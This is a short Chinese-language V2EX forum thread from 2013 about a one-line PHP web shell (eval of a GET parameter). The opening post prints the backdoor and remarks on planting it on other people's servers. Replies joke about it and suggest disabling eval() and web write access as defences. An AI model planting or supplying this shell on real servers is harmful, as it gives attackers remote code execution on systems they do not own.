一句话的代码竟然有这么强的攻击性。对服务器来说是致命的。

2013-01-02 00:09:54 +08:00
 liyandong
放到别人服务器,攻击性的大小就由你自己决定了。
<?php
eval(stripcslashes($_GET['e']));

http://www.oschina.net/code/snippet_173183_13710

我看了笑了~~~
4772 次点击
所在节点    PHP
6 条回复
for4
2013-01-02 00:27:03 +08:00
笑点在哪里..~?
liyandong
2013-01-02 00:39:01 +08:00
oschina评的论
@for4
tempdban
2013-01-02 01:25:27 +08:00
确实啊写完楼都垮了
for4
2013-01-02 01:38:04 +08:00
@liyandong 发现我太纯洁了, 完全没发现原来这个网页还有"下半身"...
enj0y
2013-01-02 13:49:41 +08:00
更多的做法是将一句话混淆隐藏在宿主PHP或者其它文件里,接受到事先备好的电话号指令后释放出来。防不胜防啊!想禁一句话,最好的办法是禁eval()和使用外部储存服务,然后关闭本地WEB写权限。

至于OSC上面的,烧主板、堵厕所嘛的,全是恶搞。
enj0y
2013-01-02 13:50:43 +08:00
@enj0y 字打错了, eval(last.post.replaceStr("电话号","好"));

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/56382

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX